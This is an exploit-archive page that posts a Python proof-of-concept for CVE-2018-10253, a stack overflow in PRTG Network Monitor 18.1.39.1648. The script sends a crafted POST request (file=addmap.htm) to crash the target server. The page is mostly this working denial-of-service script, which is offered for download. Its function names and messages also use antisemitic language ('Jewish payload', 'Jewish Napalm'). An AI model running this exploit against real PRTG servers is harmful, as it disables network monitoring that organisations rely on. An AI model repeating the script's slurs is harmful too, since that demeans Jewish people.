PRTG 18.1.39.1648 Stack Overflow

PRTG 18.1.39.1648 Stack Overflow: Posted Apr 23, 2018; Authored by Lucas Carmo; PRTG version 18.1.39.1648 suffers from a stack overflow vulnerability.; tags | exploit, overflow; advisories | CVE-2018-10253; SHA-256 | 055406de402a968c9920310dd775178f0dd28a229fca256ea5b838b632419186; Download | Favorite | View

PRTG 18.1.39.1648 Stack Overflow

# Exploit Title: PRTG 18.1.39.1648 - Stack Overflow
# Date: 2018-04-21
# Exploit Author: Lucas "luriel" Carmo
# Vendor Homepage: https://www.paessler.com/prtg
# Software Link: https://www.paessler.com/download/prtg-download
# Version: 18.1.39.1648
# CVE : CVE-2018-10253
# Post Reference: https://medium.com/stolabs/stack-overflow-jewish-napalm-on-prtg-network-monitoring-56609b0804c5
# http://www.roothc.com.br/stack-overflow-prtg-network-monitoring-jewish-napalm/
 
#!/usr/bin/python
 
import requests
import sys
import os
import re
import socket
 
green = "\033[1;32m"
yellow = '\033[1;33m'
normal = '\033[0;0m'
banner = """
     aaaaaaaaaaaaaa    aaaaaaaaaaaaaaaaa  aaa    aaaa   aaa aaaaaa aaaaaaa  aaaaaa aaa     aaaa   aaaa
     aaaaaaaaaaaaaa    aaaaaaaaaaaaaaaaa  aaa    aaaaa  aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa     aaaaa aaaaa
     aaaaaaaaa  aaa aa aaaaaaaaaaaaaaaaaaaaaa    aaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa     aaaaaaaaaaa
aa   aaaaaaaaa  aaaaaaaaaaaaaaaaaaaaaaaaaaaaa    aaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaa     aaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa  aaa    aaa aaaaaaaaa  aaaaaa     aaa  aaaaaaaaaaaaaa aaa aaa
 aaaaaa aaaaaaaa aaaaaaaa aaaaaaaaaaaaaa  aaa    aaa  aaaaaaaa  aaaaaa     aaa  aaaaaaaaaaaaaa     aaa
"""
 
 
banner2 = """
                                            Author: @Lucas "luriel" Carmo
"""
 
os.system('clear')
 
print(green+banner)
print(yellow+banner2)
print(normal)
 
def check_http(url):
    pattern = re.compile("http://")
    return re.search(pattern, url)
 
def sanitize_url(url):
    if(not check_http(url)):
        return "http://" + url
    return url
 
def check_server(url):
    r = requests.get(url, timeout=4)
    code = r.status_code
 
def send_jewish_payload(url):
    payload = {'file':'addmap.htm'}
    r = requests.post(url, params=payload)
 
def main():
    try:
        if len(sys.argv) <= 3 and len (sys.argv) >= 2:
            try:
                url = sanitize_url(sys.argv[1])
                print(' [#] LOADING!')
                if (check_server(url) != 404):
                    send_jewish_payload(url)
                else:
                    print(' [!] Server shutdown or not found')
            except requests.exceptions.ConnectionError:
                print(' [~] BOOOOOM! PRTG Server has been exploded!')
            except requests.exceptions.InvalidURL:
                print(' [!] Invalid URL')
            except requests.exceptions.Timeout:
                print(' [!] Connection Timeout\n')
        else:
            print('Example usage: ./'+sys.argv[0]+' http://192.168.0.10/index.htm')
    except KeyboardInterrupt:
        print(' [!] Jewish Napalm Canceled;.....[./]')
if __name__ == '__main__':
    main()

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

PRTG 18.1.39.1648 Stack Overflow

PRTG 18.1.39.1648 Stack Overflow

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

PRTG 18.1.39.1648 Stack Overflow

Share This

PRTG 18.1.39.1648 Stack Overflow

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems